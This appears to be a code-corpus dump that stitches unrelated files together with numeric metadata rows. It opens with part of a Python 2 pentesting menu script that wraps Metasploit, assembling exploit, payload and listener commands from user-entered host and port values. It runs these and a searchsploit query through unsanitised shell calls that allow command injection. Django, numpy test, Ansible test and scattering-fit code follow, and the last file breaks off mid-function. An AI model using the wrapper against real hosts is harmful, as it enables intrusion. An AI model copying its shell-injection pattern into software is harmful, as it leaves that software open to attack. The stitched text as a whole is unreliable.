lhost = raw_input( bcolors.HEADER+"\n[*] Please provide the Local Host if required (LHOST) or press 'Enter' to continue': "+bcolors.ENDC)
if lhost!= "":
command = command + "set LHOST " + lhost + ";"
lport = raw_input( bcolors.HEADER+"\n[*] Please provide the Local Host if required (LPORT) or press 'Enter' to continue': "+bcolors.ENDC)
if lport!= "":
command = command + "set LPORT " + lport + ";"
rhost = raw_input( bcolors.HEADER+"\n[*] Please provide the Remote Host if required (RHOST) or press 'Enter' to continue': "+bcolors.ENDC)
if rhost!= "":
command = command + "set RHOST " + rhost + ";" + "set RHOSTS "+rhost+";"
rport = raw_input( bcolors.HEADER+"\n[*] Please provide the Remote Port to connect to if required (RPORT) or press 'Enter' to continue': "+bcolors.ENDC)
if rport!= "":
command = command + "set RPORT " + rport + ";"
srvhost = raw_input( bcolors.HEADER+"\n[*] Please provide the Server Host Address if required (SRVHOST) or press 'Enter' to continue': "+bcolors.ENDC)
if srvhost!= "":
command = command + "set SRVHOST " + srvhost + ";"
srvport = raw_input( bcolors.HEADER+"\n[*] Please provide the Server Port if required (SRVPORT) or press 'Enter' to continue': "+bcolors.ENDC)
if srvport!= "":
command = command + "set SRVPORT " + srvport + ";"
choice = raw_input( bcolors.HEADER+"\n[*] Press 'Y' or 'y' if you require a payload or press 'Enter' to continue' : "+bcolors.ENDC)
if choice == 'Y' or choice == 'y':
payload = payload_listener()
command = command + "set payload "+payload+";"
else:
payload = ""
command = command + "\""
print bcolors.HEADER+bcolors.BOLD+ "\n[*] Your options till now:"+bcolors.ENDC+bcolors.HEADER+"\n\n[+] Exploit: "+bcolors.ENDC+exploit+bcolors.HEADER+"\n[+] Payload: "+bcolors.ENDC+payload+bcolors.HEADER+"\n[+] LHOST: "+bcolors.ENDC+lhost+bcolors.HEADER+"\n[+] LPORT: "+bcolors.ENDC+lport+bcolors.HEADER+"\n[+] RHOST: "+bcolors.ENDC+rhost+bcolors.HEADER+"\n[+] RPORT: "+bcolors.ENDC+rport+bcolors.HEADER+"\n[+] SRVHOST: "+bcolors.ENDC+srvhost+bcolors.HEADER+"\n[+] SRVPORT: "+bcolors.ENDC+srvport
get = raw_input(bcolors.HEADER+"\n\n[*] Press any key to proceed or 'b' to reset options: "+ bcolors.ENDC)
if get == 'b' or get == 'B':
continue
else:
break
print "\n"
print bcolors.HEADER + bcolors.BOLD+"\n[*] Please Wait ...\n" +bcolors.ENDC
os.system(command)
def searchexploit():
os.system('clear')
os.system('clear')
name = " E A S Y P E N T E S T I N G F R A M E W O R K v 1 . 0 "
length_name = len(name)
banner(name,length_name)
print bcolors.HEADER + bcolors.BOLD+"\n\n[+] Welcome to Search exploit module.... "+ bcolors.ENDC
keyword = raw_input(bcolors.HEADER+"\n\n[*] Enter keyword to search exploit: "+ bcolors.ENDC)
com = Command("searchsploit "+keyword).run()
print "\n"+com.output
get = raw_input(bcolors.HEADER+"\n\n[*] Press any key to return or 'b' to search again: "+ bcolors.ENDC)
if get == 'b' or get == 'B':
searchexploit()
else:
metamain()
# main function
def metamain():
os.system('clear')
os.system('clear')
global name
global length_name
os.system('clear')
os.system('clear')
name = " E A S Y P E N T E S T I N G F R A M E W O R K v 1 . 0 "
length_name = len(name)
banner(name,length_name)
print bcolors.HEADER + bcolors.BOLD+"\n[+] Welcome to Metasploit\n"+ bcolors.ENDC
while True:
os.system('clear')
os.system('clear')
banner(name,length_name)
print bcolors.HEADER + bcolors.BOLD+"\n[+] Welcome to Metasploit... \n"+ bcolors.ENDC
print bcolors.HEADER + bcolors.BOLD+"[*] Choose your scan type: "+ bcolors.ENDC
mychoice=raw_input("\n1) Create payload with msfvenom\n2) Create Listener\n3) Update Metasploit\n4) Find exploit \n5) Return to previous menu\n\n"+bcolors.HEADER + bcolors.BOLD+"[*] Choose your option : "+bcolors.ENDC)
mylist=[]
mylist = mychoice.split(',')
if len(mylist)==1:
choice = mylist[0]
if int(choice) == 1:
createpayload()
elif int(choice) == 2:
listener()
elif int(choice) ==3:
os.system('clear')
os.system('clear')
name = " E A S Y P E N T E S T I N G F R A M E W O R K v 1 . 0 "
length_name = len(name)
banner(name,length_name)
print "\n"
os.system("apt install metasploit-framework")
get = raw_input(bcolors.HEADER+"\n[*] Press any key to return..."+ bcolors.ENDC)
print "\n"
elif int(choice)==4:
searchexploit()
elif int(choice)==5:
options()
else:
print bcolors.FAIL + bcolors.BOLD+"\n[-] Error: Invalid Input !"+ bcolors.ENDC
def update_progress(progress,name):
barLength = 20 # Modify this to change the length of the progress bar
status = ""
if isinstance(progress, int):
progress = float(progress)
if not isinstance(progress, float):
progress = 0
status = "error: progress var must be float\r\n"
if progress < 0:
progress = 0
status = "Halt...\r\n"
if progress >= 1:
progress = 1
status = "Done :)\r\n"
block = int(round(barLength*progress))
text = "\r"+name+": [{0}] {1}% {2}".format( "#"*block + "-"*(barLength-block), progress*100, status)
sys.stdout.write(text)
sys.stdout.flush()
def interfaces():
global wifi
global eth
for i in range(101):
time.sleep(0.005)
update_progress(i/100.0,"[*] Detecting your hardware interfaces")
com = Command("ifconfig | grep \"wl\" | cut -d \" \" -f 1").run()
wifi = com.output.split(':')[0]
com = Command("ifconfig | grep \"et\" | cut -d \" \" -f 1").run()
eth = com.output.split(':')[0]
for i in range(0,10):
response = raw_input("\n[*] Is your wireless interface '"+wifi+"'? (y|n): ")
if response == 'Y' or response == 'y' or response == 'YES' or response == 'yes' or response == 'Yes':
wifi=wifi
break
elif response == 'N' or response == 'n' or response == 'NO' or response == 'no' or response == 'No':
wifi=raw_input("\n[*] Enter your wlan interface name as displayed in (ifconfig): ")
break
else:
print bcolors.FAIL+bcolors.BOLD+"\n[-] Error: Wrong response"+bcolors.ENDC
for i in range(0,10):
response = raw_input("\n[*] Is your wired interface '"+eth+"'? (y|n): ")
if response == 'Y' or response == 'y' or response == 'YES' or response == 'yes' or response == 'Yes':
eth=eth
break
elif response == 'N' or response == 'n' or response == 'NO' or response == 'no' or response == 'No':
eth=raw_input("\n[*] Enter your wired interface name as displayed in (ifconfig): ")
break
else:
print bcolors.FAIL+bcolors.BOLD+"\n[-] Error: Wrong response"+bcolors.ENDC
class Command(object):
"""Run a command and capture it's output string, error string and exit status"""
def __init__(self, command):
self.command = command
def run(self, shell=True):
import subprocess as sp
process = sp.Popen(self.command, shell = shell, stdout = sp.PIPE, stderr = sp.PIPE)
self.pid = process.pid
self.output, self.error = process.communicate()
self.failed = process.returncode
return self
@property
def returncode(self):
return self.failed
def viewmac():
print "\n[+] The MAC of your WLAN interface '"+wifi+"' is:",
com = Command("ifconfig "+wifi+" | grep ether | cut -d \" \" -f 10").run()
print com.output
print "[+] The MAC of your wired interface '"+eth+"' is:",
com = Command("ifconfig "+eth+" | grep ether | cut -d \" \" -f 10").run()
print com.output
return
def options():
while 1:
os.system("clear")
os.system("clear")
name = " E A S Y P E N T E S T I N G F R A M E W O R K v 1 . 0 "
length_name = len(name)
banner(name,length_name)
print bcolors.HEADER + bcolors.BOLD+"\n[+] Welcome ! Please select an option below.... "+ bcolors.ENDC
choice = raw_input("\n1) Enable "+wifi+"\n2) Disable "+wifi+"\n3) Enable "+eth+"\n4) Disable "+eth+"\n5) View MAC\n6) View Public IP\n7) Run NMAP\n8) Run Metasploit\n9) Re-register interfaces\n10) Exit\n\n"+bcolors.HEADER + bcolors.BOLD+"[+] Enter your choice: "+bcolors.ENDC)
if choice == '1':
com = Command("ifconfig "+wifi+" up").run()
print bcolors.HEADER+bcolors.BOLD
for i in range(101):
time.sleep(0.005)
update_progress(i/100.0,"[+] Enabling")
print bcolors.ENDC
get = raw_input(bcolors.HEADER+"\n[*] Press any key to return..."+ bcolors.ENDC)
os.system('clear')
elif choice == '2':
print bcolors.HEADER+bcolors.BOLD
com = Command("ifconfig "+wifi+" down").run()
for i in range(101):
time.sleep(0.005)
update_progress(i/100.0,"[+] Disabling")
print bcolors.ENDC
get = raw_input(bcolors.HEADER+"\n[*] Press any key to return..."+ bcolors.ENDC)
os.system('clear')
elif choice == '3':
print bcolors.HEADER+bcolors.BOLD
com = Command("ifconfig "+eth+" up").run()
for i in range(101):
time.sleep(0.005)
update_progress(i/100.0,"[+] Enabling")
print bcolors.ENDC
get = raw_input(bcolors.HEADER+"\n[*] Press any key to return..."+ bcolors.ENDC)
os.system('clear')
elif choice == '4':
print bcolors.HEADER+bcolors.BOLD
com = Command("ifconfig "+eth+" down").run()
for i in range(101):
time.sleep(0.005)
update_progress(i/100.0,"[+] Disabling")
print bcolors.ENDC
get = raw_input(bcolors.HEADER+"\n[*] Press any key to return..."+ bcolors.ENDC)
os.system('clear')
elif choice== '5':
print bcolors.HEADER+bcolors.BOLD
viewmac()
print bcolors.ENDC
get = raw_input(bcolors.HEADER+"[*] Press any key to return..."+ bcolors.ENDC)
os.system('clear')
elif choice== '6':
print bcolors.HEADER+bcolors.BOLD
com = Command("dig +short myip.opendns.com @resolver1.opendns.com").run()
print "\n[+] Your public IP is: "+com.output
print bcolors.ENDC
get = raw_input(bcolors.HEADER+"[*] Press any key to return..."+ bcolors.ENDC)
os.system('clear')
elif choice== '7':
print bcolors.HEADER+bcolors.BOLD
print "\n"
for i in range(101):
time.sleep(0.01)
update_progress(i/100.0,"[+] Loading NMAP")
print bcolors.ENDC
nmapmain()
elif choice== '8':
print bcolors.HEADER+bcolors.BOLD
print "\n"
for i in range(101):
time.sleep(0.01)
update_progress(i/100.0,"[+] Loading Metasploit")
print bcolors.ENDC
metamain()
elif choice == '9':
main()
elif choice == '10':
exit()
else:
print bcolors.FAIL+bcolors.BOLD+"\n[-] Invalid Input"+bcolors.ENDC
get = raw_input(bcolors.HEADER+"\n[*] Press any key to return..."+ bcolors.ENDC)
def main():
global name
global length_name
os.system('clear')
name = " E A S Y P E N T E S T I N G F R A M E W O R K v 1 . 0 "
length_name = len(name)
banner(name,length_name)
print bcolors.HEADER + bcolors.BOLD+"\n[+] Configuring your hardware.... \n\n"+ bcolors.ENDC
interfaces()
print "\n"
for i in range(101):
time.sleep(0.01)
update_progress(i/100.0,"[*] Registering options")
os.system('clear')
options()
if __name__ == '__main__':
main()
| 41.991803
| 2,274
| 0.663088
| 6,014
| 40,984
| 4.461922
| 0.075324
| 0.072147
| 0.034881
| 0.063502
| 0.754192
| 0.737013
| 0.722926
| 0.713162
| 0.675449
| 0.654878
| 0
| 0.01685
| 0.161551
| 40,984
| 975
| 2,275
| 42.034872
| 0.764049
| 0.0071
| 0
| 0.640788
| 0
| 0.040556
| 0.350754
| 0.096345
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.004635
| null | null | 0.15759
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
96f4c192bb0223616eb8d2cd7e1cb571838fcc50
| 70
|
py
|
Python
|
test_project/test_app/models.py
|
tumb1er/django-admin-countless
|
74ff259ddbaa02fdd39aafe45f5aaefcd8d60887
|
[
"MIT"
] | 2
|
2020-07-29T18:31:55.000Z
|
2021-07-02T13:22:45.000Z
|
test_project/test_app/models.py
|
tumb1er/django-admin-countless
|
74ff259ddbaa02fdd39aafe45f5aaefcd8d60887
|
[
"MIT"
] | 26
|
2020-04-15T09:37:57.000Z
|
2021-12-07T15:28:04.000Z
|
test_project/test_app/models.py
|
tumb1er/django-admin-countless
|
74ff259ddbaa02fdd39aafe45f5aaefcd8d60887
|
[
"MIT"
] | 1
|
2020-03-24T12:17:12.000Z
|
2020-03-24T12:17:12.000Z
|
from django.db import models
class MyModel(models.Model):
pass
| 10
| 28
| 0.728571
| 10
| 70
| 5.1
| 0.9
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.2
| 70
| 6
| 29
| 11.666667
| 0.910714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 6
|
8c398ec879f21f7e5d7f311e5dc47bc1ae40e660
| 4,312
|
py
|
Python
|
lace/test_colors.py
|
bodylabs/lace
|
a6ae80787c8c6ba197bd9bad9254b503f4e05c73
|
[
"BSD-2-Clause"
] | 2
|
2020-05-30T10:28:34.000Z
|
2021-02-17T13:47:23.000Z
|
lace/test_colors.py
|
lace/lace
|
a6ae80787c8c6ba197bd9bad9254b503f4e05c73
|
[
"BSD-2-Clause"
] | 11
|
2019-08-29T16:53:29.000Z
|
2021-07-01T06:24:37.000Z
|
lace/test_colors.py
|
metabolize/lace
|
75cee6a118932cd027692d6cfe36b3726b3a4a5c
|
[
"BSD-2-Clause"
] | 5
|
2017-05-09T16:18:16.000Z
|
2018-05-08T16:16:09.000Z
|
import unittest
import numpy as np
from lace.mesh import Mesh
from lace import color
class TestMeshColors(unittest.TestCase):
def setUp(self):
self.colormap = 'jet'
self.jet_0 = np.array([0.0, 0.0, 0.5])
self.jet_1 = np.array([0.5, 0.0, 0.0])
def test_colors_like_with_full_array(self):
c = np.random.rand(10, 3)
v = np.ones((10, 3))
vc = color.colors_like(c, v)
np.testing.assert_array_equal(c, vc)
self.assertEqual(vc.dtype, np.float64)
def test_colors_like_with_full_array_transposed(self):
c = np.random.rand(10, 3)
v = np.ones((10, 3))
vc = color.colors_like(c.T, v)
np.testing.assert_array_equal(c, vc)
self.assertEqual(vc.dtype, np.float64)
def test_colors_like_with_single_row(self):
c = np.array([[1.0, 0.0, 1.0, 0.0]])
v = np.ones((4, 3))
vc = color.colors_like(c, v, colormap=self.colormap)
expected_c = np.array([self.jet_1, self.jet_0, self.jet_1, self.jet_0])
np.testing.assert_array_equal(expected_c, vc)
self.assertEqual(vc.dtype, np.float64)
def test_colors_like_with_single_col(self):
c = np.array([[1.0], [0.0], [1.0], [0.0]])
v = np.ones((4, 3))
vc = color.colors_like(c, v, colormap=self.colormap)
expected_c = np.array([self.jet_1, self.jet_0, self.jet_1, self.jet_0])
np.testing.assert_array_equal(expected_c, vc)
self.assertEqual(vc.dtype, np.float64)
def test_colors_like_with_array(self):
c = np.array([1.0, 0.0, 1.0, 0.0])
v = np.ones((4, 3))
vc = color.colors_like(c, v, colormap=self.colormap)
expected_c = np.array([self.jet_1, self.jet_0, self.jet_1, self.jet_0])
np.testing.assert_array_equal(expected_c, vc)
self.assertEqual(vc.dtype, np.float64)
def test_colors_like_with_list(self):
c = [1.0, 0.0, 1.0, 0.0]
v = np.ones((4, 3))
vc = color.colors_like(c, v, colormap=self.colormap)
expected_c = np.array([self.jet_1, self.jet_0, self.jet_1, self.jet_0])
np.testing.assert_array_equal(expected_c, vc)
self.assertEqual(vc.dtype, np.float64)
def test_colors_like_with_name(self):
c = 'red'
v = np.ones((4, 3))
vc = color.colors_like(c, v, colormap=self.colormap)
expected_c = np.array([1.0, 0.0, 0.0]) * v
np.testing.assert_array_equal(expected_c, vc)
self.assertEqual(vc.dtype, np.float64)
def test_colors_like_rgb_triple_as_array(self):
c = [1.0, 0.0, 1.0]
v = np.ones((4, 3))
vc = color.colors_like(c, v, colormap=self.colormap)
expected_c = np.array([1.0, 0.0, 1.0]) * v
np.testing.assert_array_equal(expected_c, vc)
self.assertEqual(vc.dtype, np.float64)
def test_colors_like_rgb_triple_as_col(self):
c = [[1.0], [0.0], [1.0]]
v = np.ones((4, 3))
vc = color.colors_like(c, v, colormap=self.colormap)
expected_c = np.array([1.0, 0.0, 1.0]) * v
np.testing.assert_array_equal(expected_c, vc)
self.assertEqual(vc.dtype, np.float64)
def test_colors_like_rgb_triple_as_row(self):
c = [[1.0, 0.0, 1.0]]
v = np.ones((4, 3))
vc = color.colors_like(c, v, colormap=self.colormap)
expected_c = np.array([1.0, 0.0, 1.0]) * v
np.testing.assert_array_equal(expected_c, vc)
self.assertEqual(vc.dtype, np.float64)
def test_colors_like_none_or_empty(self):
for c in [None, [], (), np.array([])]:
v = np.ones((4, 3))
vc = color.colors_like(c, v, colormap=self.colormap)
self.assertIsNone(vc)
def test_setting_vc_in_mesh_constructor(self):
m = Mesh(v=np.ones((4, 3)), vc='red')
expected_c = np.array([1.0, 0.0, 0.0]) * m.v
np.testing.assert_array_equal(expected_c, m.vc)
self.assertEqual(m.vc.dtype, np.float64)
def test_scale_vertex_colors(self):
m = Mesh(v=np.ones((4, 3)), vc='red')
m.scale_vertex_colors(np.array([2.0, 1.0, 0.5, 0.0]))
expected_c = np.array([[1.0, 0.0, 0.0], [0.5, 0.0, 0.0], [0.25, 0.0, 0.0], [0.0, 0.0, 0.0]])
np.testing.assert_array_equal(expected_c, m.vc)
self.assertEqual(m.vc.dtype, np.float64)
| 39.925926
| 100
| 0.603664
| 735
| 4,312
| 3.352381
| 0.088435
| 0.051136
| 0.048701
| 0.030844
| 0.861201
| 0.858766
| 0.84862
| 0.832792
| 0.830357
| 0.826299
| 0
| 0.061076
| 0.236781
| 4,312
| 107
| 101
| 40.299065
| 0.687633
| 0
| 0
| 0.591398
| 0
| 0
| 0.002783
| 0
| 0
| 0
| 0
| 0
| 0.268817
| 1
| 0.150538
| false
| 0
| 0.043011
| 0
| 0.204301
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
8c39dcc44a9ec5784795c1a5f333c5d3a000aca1
| 96
|
py
|
Python
|
perceptron/utils/symbolic_interval/__init__.py
|
jiayunhan/perceptron-benchmark
|
39958a15e9f8bfa82938a3f81d4f216457744b22
|
[
"Apache-2.0"
] | 107
|
2020-06-15T09:55:11.000Z
|
2020-12-20T11:27:11.000Z
|
pytorch_ares/third_party/hydra/symbolic_interval/__init__.py
|
haichen-ber/ares
|
474d549aa402b4cdd5e3629d23d035c31b60a360
|
[
"MIT"
] | 7
|
2020-06-14T03:00:18.000Z
|
2020-12-07T07:10:10.000Z
|
pytorch_ares/third_party/hydra/symbolic_interval/__init__.py
|
haichen-ber/ares
|
474d549aa402b4cdd5e3629d23d035c31b60a360
|
[
"MIT"
] | 19
|
2020-06-14T08:35:33.000Z
|
2020-12-19T13:43:41.000Z
|
from .interval import Interval, Symbolic_interval
from .symbolic_network import Interval_network
| 48
| 49
| 0.885417
| 12
| 96
| 6.833333
| 0.416667
| 0.341463
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.083333
| 96
| 2
| 50
| 48
| 0.931818
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
4fb207d06f889fa7fe07eee6647d5cc56410addc
| 167
|
py
|
Python
|
pool_automation/roles/ansible_bootstrap/molecule/resources/tests/test_default.py
|
Rob-S/indy-node
|
0aefbda62c5a7412d7e03b2fb9795c500ea67e9f
|
[
"Apache-2.0"
] | 627
|
2017-07-06T12:38:08.000Z
|
2022-03-30T13:18:43.000Z
|
pool_automation/roles/ansible_bootstrap/molecule/resources/tests/test_default.py
|
Rob-S/indy-node
|
0aefbda62c5a7412d7e03b2fb9795c500ea67e9f
|
[
"Apache-2.0"
] | 580
|
2017-06-29T17:59:57.000Z
|
2022-03-29T21:37:52.000Z
|
pool_automation/roles/ansible_bootstrap/molecule/resources/tests/test_default.py
|
Rob-S/indy-node
|
0aefbda62c5a7412d7e03b2fb9795c500ea67e9f
|
[
"Apache-2.0"
] | 704
|
2017-06-29T17:45:34.000Z
|
2022-03-30T07:08:58.000Z
|
def test_python_is_installed(host):
assert host.run('python --version').rc == 0
def test_sudo_is_installed(host):
assert host.run('sudo --version').rc == 0
| 20.875
| 47
| 0.694611
| 26
| 167
| 4.230769
| 0.461538
| 0.127273
| 0.272727
| 0.381818
| 0.509091
| 0.509091
| 0
| 0
| 0
| 0
| 0
| 0.014085
| 0.149701
| 167
| 7
| 48
| 23.857143
| 0.760563
| 0
| 0
| 0
| 0
| 0
| 0.180723
| 0
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0.5
| false
| 0
| 0
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
4fc8e3c3693e7e0eaf927f62583fe2fe775aeb72
| 14,172
|
py
|
Python
|
src/fffs/sas/bilayer/bilayer.py
|
awacha/fffs
|
6a3ce47c5381ae33fe02909754750ff7f0cf2b8c
|
[
"BSD-3-Clause"
] | null | null | null |
src/fffs/sas/bilayer/bilayer.py
|
awacha/fffs
|
6a3ce47c5381ae33fe02909754750ff7f0cf2b8c
|
[
"BSD-3-Clause"
] | null | null | null |
src/fffs/sas/bilayer/bilayer.py
|
awacha/fffs
|
6a3ce47c5381ae33fe02909754750ff7f0cf2b8c
|
[
"BSD-3-Clause"
] | null | null | null |
from ...core import ModelFunction, ParameterDefinition
from matplotlib.figure import Figure
from matplotlib.axes import Axes
from typing import Union, List, Tuple
import numpy as np
from .gauss_bilayer import ISSVasymm
class GaussianBilayerAsymm(ModelFunction):
category = 'sas'
subcategory = 'bilayer'
name = 'gaussian_bilayer_asymm'
description = 'Fully asymmetric gaussian bilayer'
parameters = [ParameterDefinition('A', 'outer intensity scaling factor', 1, lbound=0),
ParameterDefinition('bg', 'constant background', 0, lbound=0),
ParameterDefinition('R0', 'radius of the innermost bilayer', 40, lbound=0),
ParameterDefinition('dR', 'hwhm of the radius of the innermost bilayer', 5, lbound=0),
ParameterDefinition('rhoGuestIn', 'relative electron density of the inner guest molecule layer (tail is -1)', 0),
ParameterDefinition('zGuestIn', 'distance of the inner guest molecule layer from the bilayer center',
10, lbound=0),
ParameterDefinition('sigmaGuestIn', 'HWHM of the inner guest molecule layer', 5, lbound=0),
ParameterDefinition('rhoHeadIn', 'relative electron density of the inner headgroup layer (tail is -1)', 1),
ParameterDefinition('zHeadIn', 'distance of the inner headgroup layer from the bilayer center',
2.5, lbound=0),
ParameterDefinition('sigmaHeadIn', 'HWHM of the inner headgroup layer', 5, lbound=0),
ParameterDefinition('sigmaTail', 'HWHM of the tail layer', 1, lbound=0),
ParameterDefinition('rhoHeadOut', 'relative electron density of the outer headgroup layer (tail is -1)', 1),
ParameterDefinition('zHeadOut', 'distance of the outer headgroup layer from the bilayer center',
2.5, lbound=0),
ParameterDefinition('sigmaHeadOut', 'HWHM of the outer headgroup layer', 5, lbound=0),
ParameterDefinition('rhoGuestOut',
'relative electron density of the outer guest molecule layer (tail is -1)', 0),
ParameterDefinition('zGuestOut', 'distance of the outer guest molecule layer from the bilayer center',
10, lbound=0),
ParameterDefinition('sigmaGuestOut', 'HWHM of the outer guest molecule layer', 5, lbound=0),
ParameterDefinition('x_oligolam', 'Proportion of oligolamellarity',0.5,lbound=0, ubound=1),
ParameterDefinition('dbilayer', 'Periodic repeat distance of the bilayers', 6.4, lbound=0),
ParameterDefinition('ddbilayer', 'HWHM of the periodic repeat distance of the bilayers', 0.1, lbound=0),
ParameterDefinition('Nbilayer', 'Number of bilayers', 2, lbound=1, fittable=False, coerce_type=int),
ParameterDefinition('Ndistrib', 'Size distribution integration count', 70, lbound=1, fittable=False, coerce_type=int),
]
def fitfunction(self, x:Union[np.ndarray, float], *args, **kwargs):
(A, bg, R0, dR,
rhoGuestIn, zGuestIn, sigmaGuestIn,
rhoHeadIn, zHeadIn, sigmaHeadIn,
sigmaTail,
rhoHeadOut, zHeadOut, sigmaHeadOut,
rhoGuestOut, zGuestOut, sigmaGuestOut,
x_oligolam,
dbilayer, ddbilayer,
Nbilayer, Ndistrib
) = args
return A*x_oligolam*ISSVasymm(x, R0, dR, rhoGuestIn, zGuestIn, sigmaGuestIn,
rhoHeadIn, zHeadIn, sigmaHeadIn,
-1, sigmaTail,
rhoHeadOut, zHeadOut, sigmaHeadOut,
rhoGuestOut, zGuestOut, sigmaGuestOut,
dbilayer, ddbilayer,
int(Nbilayer), int(Ndistrib)) +\
A*(1-x_oligolam)* ISSVasymm(x, R0, dR, rhoGuestIn, zGuestIn, sigmaGuestIn,
rhoHeadIn, zHeadIn, sigmaHeadIn,
-1, sigmaTail,
rhoHeadOut, zHeadOut, sigmaHeadOut,
rhoGuestOut, zGuestOut, sigmaGuestOut,
dbilayer, ddbilayer,
1, int(Ndistrib)) + \
bg
def visualize(self, fig:Figure, x:Union[np.ndarray, float], *args, **kwargs):
ax=fig.add_subplot(1,1,1)
(A, bg, R0, dR,
rhoGuestIn, zGuestIn, sigmaGuestIn,
rhoHeadIn, zHeadIn, sigmaHeadIn,
sigmaTail,
rhoHeadOut, zHeadOut, sigmaHeadOut,
rhoGuestOut, zGuestOut, sigmaGuestOut,
x_oligolam,
dbilayer, ddbilayer,
Nbilayer, Ndistrib
) = args
self._plotgaussians(ax, R0, dbilayer, Nbilayer, [
(rhoGuestIn, -zGuestIn, sigmaGuestIn, 'Inner guest'),
(rhoHeadIn, -zHeadIn, sigmaHeadIn, 'Inner head'),
(-1, 0, sigmaTail, 'Carbon chain'),
(rhoHeadOut, zHeadOut, sigmaHeadOut, 'Outer head'),
(rhoGuestOut, zGuestOut, sigmaGuestOut, 'Outer guest')
])
fig.canvas.draw()
@staticmethod
def _gaussian(x, A, x0, sigma):
# the area under the peak must be 4*pi*sqrt(2*pi*sigma**2)*(x0**2+sigma**2)
if sigma==0:
return np.zeros_like(x)
return A*np.exp(-(x-x0)**2/(2*sigma**2))
def _plotgaussians(self, axes:Axes, R0:float, d:float, Nbilayers:int, values:List[Tuple[float,float,float,str]]):
Nbilayers = 1
zmin = min([(z0-3*sigma) for rho, z0, sigma, label in values])+R0
zmax = max([z0+3*sigma for rho, z0, sigma, label in values])+R0+(Nbilayers-1)*d
z=np.linspace(zmin,zmax,1000)
total=0
for rho, z0, sigma, label in values:
y=0
for i in range(Nbilayers):
y += self._gaussian(z, rho, R0+z0+i*d, sigma)
axes.plot(z,y,'-',label=label)
total += y
axes.plot(z, total, 'k-', label='Total')
if R0 == 0:
axes.set_xlabel('Distance from the bilayer center (nm)')
else:
axes.set_xlabel('Radius (nm)')
axes.set_ylabel('Relative electron density')
axes.grid(True, which='both')
axes.legend(loc='best')
class GaussianBilayerAsymmGuest(GaussianBilayerAsymm):
name = 'gaussian_bilayer_asymm_Guest'
description = 'Symmetric gaussian bilayer with asymmetric guest layers'
parameters = [ParameterDefinition('A', 'outer intensity scaling factor', 9.1e-12, lbound=0),
ParameterDefinition('bg', 'constant background', 0.00272, lbound=0),
ParameterDefinition('R0', 'radius of the innermost bilayer', 37.1, lbound=0),
ParameterDefinition('dR', 'hwhm of the radius of the innermost bilayer', 0.025, lbound=0),
ParameterDefinition('rhoGuestIn', 'relative electron density of the inner guest molecule layer (tail is -1)', 0),
ParameterDefinition('zGuestIn', 'distance of the inner guest molecule layer from the bilayer center',
1.6903, lbound=0),
ParameterDefinition('sigmaGuestIn', 'HWHM of the inner guest molecule layer', 0.659, lbound=0),
ParameterDefinition('rhoHead', 'relative electron density of the headgroup layers (tail is -1)', 0.21787),
ParameterDefinition('zHead', 'distance of the headgroup layers from the bilayer center',
1.6903, lbound=0),
ParameterDefinition('sigmaHead', 'HWHM of the headgroup layers', 0.132, lbound=0),
ParameterDefinition('sigmaTail', 'HWHM of the tail layer', 0.80258, lbound=0),
ParameterDefinition('rhoGuestOut',
'relative electron density of the outer guest molecule layer (tail is -1)', 0),
ParameterDefinition('zGuestOut', 'distance of the outer guest molecule layer from the bilayer center',
1.6903, lbound=0),
ParameterDefinition('sigmaGuestOut', 'HWHM of the outer guest molecule layer', 0.2799, lbound=0),
ParameterDefinition('x_oligolam', 'Proportion of oligolamellarity',0.127,lbound=0, ubound=1),
ParameterDefinition('dbilayer', 'Periodic repeat distance of the bilayers', 7.299164, lbound=0),
ParameterDefinition('ddbilayer', 'HWHM of the periodic repeat distance of the bilayers', 0.14581464, lbound=0),
ParameterDefinition('Nbilayer', 'Number of bilayers', 2, lbound=1, fittable=False, coerce_type=int),
ParameterDefinition('Ndistrib', 'Size distribution integration count', 70, lbound=1, fittable=False, coerce_type=int),
]
def fitfunction(self, x:Union[np.ndarray, float], *args, **kwargs):
(A, bg, R0, dR,
rhoGuestIn, zGuestIn, sigmaGuestIn,
rhoHead, zHead, sigmaHead,
sigmaTail,
rhoGuestOut, zGuestOut, sigmaGuestOut,
x_oligolam,
dbilayer, ddbilayer,
Nbilayer, Ndistrib
) = args
return super().fitfunction(x, A, bg, R0, dR, rhoGuestIn, zGuestIn, sigmaGuestIn,
rhoHead, zHead, sigmaHead,
sigmaTail,
rhoHead, zHead, sigmaHead,
